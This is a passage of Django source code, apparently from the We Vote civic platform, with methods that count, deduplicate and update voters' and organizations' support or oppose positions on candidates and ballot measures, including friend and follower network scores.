in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
stance_we_are_looking_for = ANY_STANCE
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(candidate_campaign_id) and not \
positive_value_exists(candidate_campaign_we_vote_id):
return 0
retrieve_friends_positions = False
retrieve_public_positions = False
if public_or_private not in(PUBLIC_ONLY, FRIENDS_ONLY):
public_or_private = PUBLIC_ONLY
if public_or_private == FRIENDS_ONLY:
retrieve_friends_positions = True
position_list_query = PositionForFriends.objects.using('readonly').all()
else:
retrieve_public_positions = True
position_list_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
if retrieve_public_positions:
# If retrieving PositionEntered, make sure we have the necessary variables
if type(organizations_followed_we_vote_id_list) is list \
and len(organizations_followed_we_vote_id_list) == 0:
return 0
else:
# If retrieving PositionForFriends, make sure we have the necessary variables
if type(friends_we_vote_id_list) is list and len(friends_we_vote_id_list) == 0:
return 0
# Retrieve the support positions for this candidate_campaign_id
position_count = 0
try:
if positive_value_exists(candidate_campaign_id):
position_list_query = position_list_query.filter(candidate_campaign_id=candidate_campaign_id)
else:
position_list_query = position_list_query.filter(
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT:
# if retrieve_public_positions:
# # If here, include Vote Smart Ratings
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_support"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__gte=66))
# ) # Matches "is_positive_rating"
# else:
# # If looking for FRIENDS_ONLY positions, we can ignore Vote Smart data
# position_list_query = position_list_query.filter(stance=stance_we_are_looking_for)
# elif stance_we_are_looking_for == OPPOSE:
# if retrieve_public_positions:
# # If here, include Vote Smart Ratings
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_oppose"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__lte=33))
# ) # Matches "is_negative_rating"
# else:
# # If looking for FRIENDS_ONLY positions, we can ignore Vote Smart data
# position_list_query = position_list_query.filter(stance=stance_we_are_looking_for)
# else:
# position_list_query = position_list_query.filter(stance=stance_we_are_looking_for)
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
# Only one of these blocks will be used at a time
if retrieve_friends_positions and friends_we_vote_id_list is not False:
# Find positions from friends. Look for we_vote_id case insensitive.
we_vote_id_filter = Q()
for we_vote_id in friends_we_vote_id_list:
we_vote_id_filter |= Q(voter_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
if retrieve_public_positions and organizations_followed_we_vote_id_list is not False:
# Find positions from organizations voter follows.
we_vote_id_filter = Q()
for we_vote_id in organizations_followed_we_vote_id_list:
we_vote_id_filter |= Q(organization_we_vote_id__iexact=we_vote_id)
position_list_query = position_list_query.filter(we_vote_id_filter)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
position_list = list(position_list_query)
position_count = len(position_list)
# position_count = position_list_query.count()
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
return position_count
def fetch_public_positions_count_for_contest_office(self, contest_office_id,
contest_office_we_vote_id,
stance_we_are_looking_for=ANY_STANCE):
return self.fetch_positions_count_for_contest_office(contest_office_id,
contest_office_we_vote_id,
stance_we_are_looking_for,
PUBLIC_ONLY)
def fetch_friends_only_positions_count_for_contest_office(self, contest_office_id,
contest_office_we_vote_id,
stance_we_are_looking_for=ANY_STANCE):
return self.fetch_positions_count_for_contest_office(contest_office_id,
contest_office_we_vote_id,
stance_we_are_looking_for,
FRIENDS_ONLY)
@staticmethod
def fetch_positions_count_for_contest_office(contest_office_id,
contest_office_we_vote_id,
stance_we_are_looking_for,
public_or_private=PUBLIC_ONLY):
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
stance_we_are_looking_for = ANY_STANCE
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(contest_office_id) and not \
positive_value_exists(contest_office_we_vote_id):
return 0
if public_or_private not in(PUBLIC_ONLY, FRIENDS_ONLY):
public_or_private = PUBLIC_ONLY
if public_or_private == FRIENDS_ONLY:
position_list_query = PositionForFriends.objects.using('readonly').all()
else:
position_list_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
# Retrieve the support positions for this contest_office_id
position_count = 0
try:
if positive_value_exists(contest_office_id):
position_list_query = position_list_query.filter(contest_office_id=contest_office_id)
else:
position_list_query = position_list_query.filter(
contest_office_we_vote_id__iexact=contest_office_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
if stance_we_are_looking_for != ANY_STANCE:
# If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT:
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_support"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__gte=66)) # "is_positive_rating"
# ) # | Q(stance=GRADE_RATING))
# elif stance_we_are_looking_for == OPPOSE:
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_oppose"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__lte=33)) # "is_negative_rating"
# ) # | Q(stance=GRADE_RATING))
# else:
# position_list_query = position_list_query.filter(stance=stance_we_are_looking_for)
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
position_count = position_list_query.count()
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
return position_count
def fetch_public_positions_count_for_contest_measure(self, contest_measure_id,
contest_measure_we_vote_id,
stance_we_are_looking_for=ANY_STANCE):
return self.fetch_positions_count_for_contest_measure(contest_measure_id,
contest_measure_we_vote_id,
stance_we_are_looking_for,
PUBLIC_ONLY)
def fetch_friends_only_positions_count_for_contest_measure(self, contest_measure_id,
contest_measure_we_vote_id,
stance_we_are_looking_for=ANY_STANCE):
return self.fetch_positions_count_for_contest_measure(contest_measure_id,
contest_measure_we_vote_id,
stance_we_are_looking_for,
FRIENDS_ONLY)
@staticmethod
def fetch_positions_count_for_contest_measure(contest_measure_id,
contest_measure_we_vote_id,
stance_we_are_looking_for,
public_or_private=PUBLIC_ONLY):
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
stance_we_are_looking_for = ANY_STANCE
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(contest_measure_id) and not \
positive_value_exists(contest_measure_we_vote_id):
return 0
if public_or_private not in(PUBLIC_ONLY, FRIENDS_ONLY):
public_or_private = PUBLIC_ONLY
if public_or_private == FRIENDS_ONLY:
position_list_query = PositionForFriends.objects.using('readonly').all()
else:
position_list_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
# Retrieve the support positions for this contest_measure_id
position_count = 0
try:
if positive_value_exists(contest_measure_id):
position_list_query = position_list_query.filter(contest_measure_id=contest_measure_id)
else:
position_list_query = position_list_query.filter(
contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT:
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_support"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__gte=66)) # "is_positive_rating"
# ) # | Q(stance=GRADE_RATING))
# elif stance_we_are_looking_for == OPPOSE:
# position_list_query = position_list_query.filter(
# Q(stance=stance_we_are_looking_for) | # Matches "is_oppose"
# (Q(stance=PERCENT_RATING) & Q(vote_smart_rating_integer__lte=33)) # "is_negative_rating"
# ) # | Q(stance=GRADE_RATING))
# else:
# position_list_query = position_list_query.filter(stance=stance_we_are_looking_for)
position_list_query = position_list_query.filter(stance__iexact=stance_we_are_looking_for)
# Limit to positions in the last x years - currently we are not limiting
# position_list = position_list.filter(election_id=election_id)
position_count = position_list_query.count()
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
return position_count
def retrieve_possible_duplicate_positions(self, google_civic_election_id, organization_we_vote_id,
candidate_we_vote_id, measure_we_vote_id,
we_vote_id_from_master=''):
position_list_objects = []
filters = []
position_list_found = False
try:
position_queryset = PositionEntered.objects.all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_queryset = position_queryset.exclude(stance__iexact=PERCENT_RATING)
position_queryset = position_queryset.filter(google_civic_election_id=google_civic_election_id)
# We don't look for office_we_vote_id because of the chance that locally we are using a
# different we_vote_id
# position_queryset = position_queryset.filter(contest_measure_we_vote_id__iexact=office_we_vote_id)
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
position_queryset = position_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# Situation 1 organization_we_vote_id + candidate_we_vote_id matches an entry already in the db
if positive_value_exists(organization_we_vote_id) and positive_value_exists(candidate_we_vote_id):
new_filter = (Q(organization_we_vote_id__iexact=organization_we_vote_id) &
Q(candidate_campaign_we_vote_id__iexact=candidate_we_vote_id))
filters.append(new_filter)
# Situation 2 organization_we_vote_id + measure_we_vote_id matches an entry already in the db
if positive_value_exists(organization_we_vote_id) and positive_value_exists(measure_we_vote_id):
new_filter = (Q(organization_we_vote_id__iexact=organization_we_vote_id) &
Q(contest_measure_we_vote_id__iexact=measure_we_vote_id))
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
position_queryset = position_queryset.filter(final_filters)
position_list_objects = position_queryset
if len(position_list_objects):
position_list_found = True
status = 'DUPLICATE_POSITIONS_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_POSITIONS_RETRIEVED'
success = True
except PositionEntered.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_DUPLICATE_POSITIONS_FOUND_DoesNotExist'
position_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_positions ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'position_list_found': position_list_found,
'position_list': position_list_objects,
}
return results
def fetch_position_network_score_list(self, viewing_voter_id, google_civic_election_id):
position_network_score_list_found = False
position_network_score_list = {}
try:
position_network_score_query = PositionNetworkScore.objects.using('readonly').all()
position_network_score_query = position_network_score_query.filter(viewing_voter_id=viewing_voter_id)
position_network_score_query = position_network_score_query.filter(
google_civic_election_id=google_civic_election_id)
position_network_score_list = list(position_network_score_query)
if len(position_network_score_list):
position_network_score_list_found = True
except Exception as e:
pass
if position_network_score_list_found:
return position_network_score_list
else:
position_network_score_list = {}
return position_network_score_list
def remove_position_network_scores_when_voter_stops_following(
self, viewing_voter_id, organization_we_vote_id):
success = True
status = "UPDATE_POSITION_NETWORK_SCORES_WHEN_ORGANIZATION_FOLLOW_CHANGES "
position_network_scores_deleted = False
if not positive_value_exists(organization_we_vote_id):
success = False
status += "DELETE_POSITION_NETWORK_SCORE-MISSING_ORGANIZATION "
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'organization_we_vote_id': organization_we_vote_id,
'position_network_scores_deleted': position_network_scores_deleted,
}
return results
try:
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_id=viewing_voter_id)
score_queryset = score_queryset.filter(organization_we_vote_id=organization_we_vote_id)
score_queryset.delete()
position_network_scores_deleted = True
status += 'POSITION_NETWORK_SCORES_DELETED-ORGANIZATION_STOP_FOLLOWING '
except Exception as e:
success = False
status += 'FAILED update_position_network_scores_when_organization_follow_changes ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(status, logger=logger)
json_data = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'organization_we_vote_id': organization_we_vote_id,
'position_network_scores_deleted': position_network_scores_deleted,
}
return json_data
def update_position_network_scores_for_one_position(self, one_position):
"""
When one position changes, update all of the PositionNetworkScore entries needed for rapid score counts
:param one_position:
:return:
"""
status = "UPDATE_POSITION_NETWORK_SCORES_FOR_ONE_POSITION "
public_positions_updated = 0
friends_only_positions_updated = 0
if not hasattr(one_position, "voter_entering_position"):
status += "NOT_A_POSITION_OBJECT "
json_data = {
'success': False,
'status': status,
'friends_only_positions_updated': friends_only_positions_updated,
'public_positions_updated': public_positions_updated,
}
return json_data
position_manager = PositionManager()
voter_manager = VoterManager()
voter_with_position_id = one_position.voter_id
voter_with_position_we_vote_id = one_position.voter_we_vote_id
voter_with_position_results = voter_manager.retrieve_voter_by_id(voter_with_position_id)
linked_organization_we_vote_id = None
if voter_with_position_results['voter_found']:
voter_with_position = voter_with_position_results['voter']
if positive_value_exists(voter_with_position.linked_organization_we_vote_id):
linked_organization_we_vote_id = voter_with_position.linked_organization_we_vote_id
if not positive_value_exists(voter_with_position_id):
voter_with_position_id = voter_with_position.id
if not positive_value_exists(voter_with_position_we_vote_id):
voter_with_position_we_vote_id = voter_with_position.we_vote_id
# If a voter_with_position exists for this position, create an entry
if positive_value_exists(voter_with_position_we_vote_id):
# Add entry to position_network_score table as a friend entry
save_for_position_holder = True
delete_for_position_holder = False
ignore_organization_voter_we_vote_id = None
candidate_we_vote_id = None
measure_we_vote_id = None
if positive_value_exists(one_position.candidate_campaign_we_vote_id):
candidate_we_vote_id = one_position.candidate_campaign_we_vote_id
elif positive_value_exists(one_position.contest_measure_we_vote_id):
measure_we_vote_id = one_position.contest_measure_we_vote_id
else:
save_for_position_holder = False
support_or_oppose = None
if one_position.is_support_or_positive_rating():
support_or_oppose = True
elif one_position.is_oppose_or_negative_rating():
support_or_oppose = False
else:
# If not support or oppose, don't save
save_for_position_holder = False
delete_for_position_holder = True
if save_for_position_holder:
# Save the entry as a "friend" of yourself
voter_with_position_speaker_display_name = one_position.speaker_display_name
update_results = position_manager.update_or_create_position_network_score(
voter_with_position_id, voter_with_position_we_vote_id,
one_position.google_civic_election_id,
ignore_organization_voter_we_vote_id, voter_with_position_we_vote_id,
voter_with_position_speaker_display_name,
candidate_we_vote_id, measure_we_vote_id,
support_or_oppose)
if update_results['position_network_score_updated']:
friends_only_positions_updated += 1
elif delete_for_position_holder:
# Delete any previous entry for yourself since you may have removed support or oppose
delete_results = position_manager.delete_one_position_network_score(
voter_with_position_id, voter_with_position_we_vote_id,
one_position.google_civic_election_id,
ignore_organization_voter_we_vote_id, voter_with_position_we_vote_id,
candidate_we_vote_id, measure_we_vote_id)
if delete_results['position_network_score_deleted']:
friends_only_positions_updated += 1
# Public Positions
if one_position.is_public_position() and positive_value_exists(one_position.organization_we_vote_id):
# Find all of the voter's following this organization
follow_organization_list_manager = FollowOrganizationList()
voters_following_list = \
follow_organization_list_manager.retrieve_follow_organization_by_organization_we_vote_id(
one_position.organization_we_vote_id)
critical_variables_exist = True
save_public_position = True
delete_public_position = False
ignore_friend_voter_we_vote_id = None
candidate_we_vote_id = None
measure_we_vote_id = None
support_or_oppose = None
if positive_value_exists(one_position.candidate_campaign_we_vote_id):
candidate_we_vote_id = one_position.candidate_campaign_we_vote_id
elif positive_value_exists(one_position.contest_measure_we_vote_id):
measure_we_vote_id = one_position.contest_measure_we_vote_id
else:
# If not candidate or measure, do not save
save_public_position = False
critical_variables_exist = False
if one_position.is_support_or_positive_rating():
support_or_oppose = True
elif one_position.is_oppose_or_negative_rating():
support_or_oppose = False
else:
# If not support or oppose, do not save, and also delete prior entries
save_public_position = False
delete_public_position = True
organization_belongs_to_voter_with_position = \
one_position.organization_we_vote_id == linked_organization_we_vote_id
if critical_variables_exist and (save_public_position or delete_public_position):
for follow_organization in voters_following_list:
voter_that_is_following_id = follow_organization.voter_id
voter_that_is_following_we_vote_id = follow_organization.voter_we_vote_id()
voter_ids_match = voter_with_position_we_vote_id == voter_that_is_following_we_vote_id
if one_position.is_public_position():
# If this is your own position, do not save it as a public position
if not organization_belongs_to_voter_with_position and not voter_ids_match:
if save_public_position:
# Add entry to position_network_score table
update_results = position_manager.update_or_create_position_network_score(
voter_that_is_following_id, voter_that_is_following_we_vote_id,
one_position.google_civic_election_id,
one_position.organization_we_vote_id, ignore_friend_voter_we_vote_id,
one_position.speaker_display_name,
candidate_we_vote_id, measure_we_vote_id,
support_or_oppose)
if update_results['position_network_score_updated']:
public_positions_updated += 1
elif delete_public_position:
delete_results = position_manager.delete_one_position_network_score(
voter_that_is_following_id, voter_that_is_following_we_vote_id,
one_position.google_civic_election_id,
one_position.organization_we_vote_id, ignore_friend_voter_we_vote_id,
candidate_we_vote_id, measure_we_vote_id)
if delete_results['position_network_score_deleted']:
public_positions_updated += 1
else:
# Make sure to delete entries for this position since it is no longer public
delete_results = position_manager.delete_one_position_network_score(
voter_that_is_following_id, voter_that_is_following_we_vote_id,
one_position.google_civic_election_id,
one_position.organization_we_vote_id, ignore_friend_voter_we_vote_id,
candidate_we_vote_id, measure_we_vote_id)
if delete_results['position_network_score_deleted']:
public_positions_updated += 1
# Friends-only positions
if one_position.is_friends_only_position() and positive_value_exists(one_position.voter_we_vote_id):
friend_manager = FriendManager()
friend_results = friend_manager.retrieve_friends_we_vote_id_list(one_position.voter_we_vote_id)
friends_we_vote_id_list = []
if friend_results['friends_we_vote_id_list_found']:
friends_we_vote_id_list = friend_results['friends_we_vote_id_list']
critical_variables_exist = True
save_for_friends = True
delete_for_friends = False
ignore_organization_voter_we_vote_id = None
candidate_we_vote_id = None
measure_we_vote_id = None
support_or_oppose = None
# Don't try to
if positive_value_exists(one_position.candidate_campaign_we_vote_id):
candidate_we_vote_id = one_position.candidate_campaign_we_vote_id
elif positive_value_exists(one_position.contest_measure_we_vote_id):
measure_we_vote_id = one_position.contest_measure_we_vote_id
else:
save_for_friends = False
critical_variables_exist = False
if one_position.is_support_or_positive_rating():
support_or_oppose = True
elif one_position.is_oppose_or_negative_rating():
support_or_oppose = False
else:
# If not support or oppose, continue to next position
save_for_friends = False
delete_for_friends = True
if critical_variables_exist and (save_for_friends or delete_for_friends):
for voter_friend_we_vote_id in friends_we_vote_id_list:
voter_friend_id = voter_manager.fetch_local_id_from_we_vote_id(voter_friend_we_vote_id)
voter_ids_match = voter_with_position_id == voter_friend_id
if not voter_ids_match:
if save_for_friends:
# Add entry to position_network_score table
update_results = position_manager.update_or_create_position_network_score(
voter_friend_id, voter_friend_we_vote_id,
one_position.google_civic_election_id,
ignore_organization_voter_we_vote_id, voter_with_position_we_vote_id,
one_position.speaker_display_name,
candidate_we_vote_id, measure_we_vote_id,
support_or_oppose)
if update_results['position_network_score_updated']:
friends_only_positions_updated += 1
elif delete_for_friends:
delete_results = position_manager.delete_one_position_network_score(
voter_friend_id, voter_friend_we_vote_id,
one_position.google_civic_election_id,
ignore_organization_voter_we_vote_id, voter_with_position_we_vote_id,
candidate_we_vote_id, measure_we_vote_id)
if delete_results['position_network_score_deleted']:
friends_only_positions_updated += 1
json_data = {
'success': True,
'status': status,
'friends_only_positions_updated': friends_only_positions_updated,
'public_positions_updated': public_positions_updated,
}
return json_data
class PositionManager(models.Model):
def __unicode__(self):
return "PositionManager"
def create_position_for_visibility_change(self, voter_id, office_we_vote_id, candidate_we_vote_id,
measure_we_vote_id, visibility_setting):
position_we_vote_id = ""
position_found = False
google_civic_election_id = 0
state_code = ''
one_unique_ballot_item_variable_received = positive_value_exists(office_we_vote_id) or \
positive_value_exists(candidate_we_vote_id) or \
positive_value_exists(measure_we_vote_id)
if visibility_setting in FRIENDS_ONLY:
position_on_stage_starter = PositionForFriends
position_on_stage = PositionForFriends()
is_public_position = False
else:
position_on_stage_starter = PositionEntered
position_on_stage = PositionEntered()
is_public_position = True
if not voter_id \
or not one_unique_ballot_item_variable_received \
or visibility_setting not in (FRIENDS_ONLY, SHOW_PUBLIC):
status = "CREATE_POSITION_FOR_VISIBILITY_CHANGE-MISSING_REQUIRED_VARIABLE"
success = False
results = {
'success': success,
'status': status,
'position_we_vote_id': "",
'position': position_on_stage,
'position_found': position_found,
'is_public_position': is_public_position
}
return results
problem_with_duplicate = False
success = False
status = "CREATE_POSITION_FOR_VISIBILITY_CHANGE"
try:
# Check for duplicate in other table
position_we_vote_id = ""
organization_id = 0
organization_we_vote_id = ""
contest_office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
retrieve_position_for_friends = not is_public_position
voter_we_vote_id = ""
duplicate_results = self.retrieve_position(position_we_vote_id,
organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
retrieve_position_for_friends,
voter_we_vote_id,
office_we_vote_id, candidate_we_vote_id, measure_we_vote_id)
if duplicate_results['position_found']:
problem_with_duplicate = True
success = False
status = 'CREATE_POSITION_FOR_VISIBILITY_CHANGE-EXISTING_POSITION_CHECK_FAILED'
except Exception as e:
problem_with_duplicate = True
success = False
status = 'CREATE_POSITION_FOR_VISIBILITY_CHANGE-EXISTING_POSITION_CHECK_FAILED'
if problem_with_duplicate:
results = {
'success': success,
'status': status,
'position_we_vote_id': position_we_vote_id,
'position': position_on_stage,
'position_found': position_found,
'is_public_position': is_public_position
}
return results
# Now that we've checked to see that there isn't an entry from the other table, create a new one
try:
# Create new
ballot_item_display_name = ""
speaker_display_name = ""
candidate_campaign_id = None
if candidate_we_vote_id:
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(candidate_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_id = candidate_campaign.id
google_civic_election_id = candidate_campaign.google_civic_election_id
state_code = candidate_campaign.state_code
ballot_item_display_name = candidate_campaign.candidate_name
contest_measure_id = None
if measure_we_vote_id:
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_id = contest_measure.id
google_civic_election_id = contest_measure.google_civic_election_id
state_code = contest_measure.state_code
ballot_item_display_name = contest_measure.measure_title
contest_office_id = None
if office_we_vote_id:
contest_office_manager = ContestOfficeManager()
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(office_we_vote_id)
if results['contest_office_found']:
contest_office = results['contest_office']
contest_office_id = contest_office.id
google_civic_election_id = contest_office.google_civic_election_id
state_code = contest_office.state_code
ballot_item_display_name = contest_office.office_name
# In order to show a position publicly we need to tie the position to either organization_we_vote_id,
# public_figure_we_vote_id or candidate_we_vote_id. For now (2016-8-17) we assume organization
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_id(voter_id)
organization_id = 0
organization_we_vote_id = ""
voter_we_vote_id = ""
if results['voter_found']:
voter = results['voter']
voter_we_vote_id = voter.we_vote_id
organization_we_vote_id = voter.linked_organization_we_vote_id
if positive_value_exists(organization_we_vote_id):
# Look up the organization_id
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(
voter.linked_organization_we_vote_id)
if organization_results['organization_found']:
organization = organization_results['organization']
organization_id = organization.id
speaker_display_name = organization.organization_name
if positive_value_exists(state_code):
state_code = state_code.lower()
position_on_stage = position_on_stage_starter(
voter_id=voter_id,
voter_we_vote_id=voter_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
candidate_campaign_we_vote_id=candidate_we_vote_id,
contest_measure_id=contest_measure_id,
contest_measure_we_vote_id=measure_we_vote_id,
contest_office_id=contest_office_id,
contest_office_we_vote_id=office_we_vote_id,
google_civic_election_id=google_civic_election_id,
state_code=state_code,
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
ballot_item_display_name=ballot_item_display_name,
speaker_display_name=speaker_display_name,
)
position_on_stage.save()
position_we_vote_id = position_on_stage.we_vote_id
position_found = True
success = True
status = 'CREATE_POSITION_FOR_VISIBILITY_CHANGE-NEW_POSITION_SAVED'
if positive_value_exists(organization_id) and positive_value_exists(organization_we_vote_id) \
and positive_value_exists(google_civic_election_id):
voter_guide_manager = VoterGuideManager()
# Make sure we have a voter guide so others can find
if not voter_guide_manager.voter_guide_exists(organization_we_vote_id, google_civic_election_id):
voter_guide_we_vote_id = ''
voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
voter_guide_we_vote_id, organization_we_vote_id, google_civic_election_id, state_code)
except Exception as e:
success = False
status = 'CREATE_POSITION_FOR_VISIBILITY_CHANGE-NEW_POSITION_COULD_NOT_BE_SAVED'
results = {
'success': success,
'status': status,
'position_we_vote_id': position_we_vote_id,
'position': position_on_stage,
'position_found': position_found,
'is_public_position': is_public_position
}
return results
def delete_one_position_network_score(self, viewing_voter_id, viewing_voter_we_vote_id, google_civic_election_id,
organization_we_vote_id, friend_voter_we_vote_id,
candidate_we_vote_id, measure_we_vote_id):
status = ""
success = True
position_network_score_deleted = False
if not positive_value_exists(viewing_voter_id) and not positive_value_exists(viewing_voter_we_vote_id):
success = False
status += "DELETE_POSITION_NETWORK_SCORE-MISSING_VOTER_IDS "
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
if not positive_value_exists(organization_we_vote_id) and not positive_value_exists(friend_voter_we_vote_id):
success = False
status += "DELETE_POSITION_NETWORK_SCORE-MISSING_ORGANIZATION_AND_FRIEND "
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
try:
if positive_value_exists(candidate_we_vote_id):
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_id=viewing_voter_id)
score_queryset = score_queryset.filter(google_civic_election_id=google_civic_election_id)
score_queryset = score_queryset.filter(candidate_we_vote_id=candidate_we_vote_id)
if positive_value_exists(organization_we_vote_id):
score_queryset = score_queryset.filter(organization_we_vote_id=organization_we_vote_id)
score_queryset.delete()
elif positive_value_exists(friend_voter_we_vote_id):
score_queryset = score_queryset.filter(friend_voter_we_vote_id=friend_voter_we_vote_id)
score_queryset.delete()
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_we_vote_id=viewing_voter_we_vote_id)
score_queryset = score_queryset.filter(google_civic_election_id=google_civic_election_id)
score_queryset = score_queryset.filter(candidate_we_vote_id=candidate_we_vote_id)
if positive_value_exists(organization_we_vote_id):
score_queryset = score_queryset.filter(organization_we_vote_id=organization_we_vote_id)
score_queryset.delete()
elif positive_value_exists(friend_voter_we_vote_id):
score_queryset = score_queryset.filter(friend_voter_we_vote_id=friend_voter_we_vote_id)
score_queryset.delete()
position_network_score_deleted = True
status += 'POSITION_NETWORK_SCORE_DELETED-CANDIDATE '
success = True
elif positive_value_exists(measure_we_vote_id):
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_id=viewing_voter_id)
score_queryset = score_queryset.filter(google_civic_election_id=google_civic_election_id)
score_queryset = score_queryset.filter(measure_we_vote_id=measure_we_vote_id)
if positive_value_exists(organization_we_vote_id):
score_queryset = score_queryset.filter(organization_we_vote_id=organization_we_vote_id)
score_queryset.delete()
elif positive_value_exists(friend_voter_we_vote_id):
score_queryset = score_queryset.filter(friend_voter_we_vote_id=friend_voter_we_vote_id)
score_queryset.delete()
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_we_vote_id=viewing_voter_we_vote_id)
score_queryset = score_queryset.filter(google_civic_election_id=google_civic_election_id)
score_queryset = score_queryset.filter(measure_we_vote_id=measure_we_vote_id)
if positive_value_exists(organization_we_vote_id):
score_queryset = score_queryset.filter(organization_we_vote_id=organization_we_vote_id)
score_queryset.delete()
elif positive_value_exists(friend_voter_we_vote_id):
score_queryset = score_queryset.filter(friend_voter_we_vote_id=friend_voter_we_vote_id)
score_queryset.delete()
position_network_score_deleted = True
status += 'POSITION_NETWORK_SCORE_DELETED-MEASURE '
success = True
else:
status += 'POSITION_NETWORK_SCORES_NOT_DELETED-MISSING_CANDIDATE_AND_MEASURE '
success = False
except Exception as e:
status += 'FAILED delete_one_position_network_score ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(status, logger=logger)
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
def retrieve_organization_candidate_campaign_position(self, organization_id, candidate_campaign_id,
google_civic_election_id=False, state_code=False):
"""
Find a position based on the organization_id & candidate_campaign_id
:param organization_id:
:param candidate_campaign_id:
:param google_civic_election_id:
:param state_code:
:return:
"""
organization_we_vote_id = ''
position_we_vote_id = ''
voter_id = 0
office_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
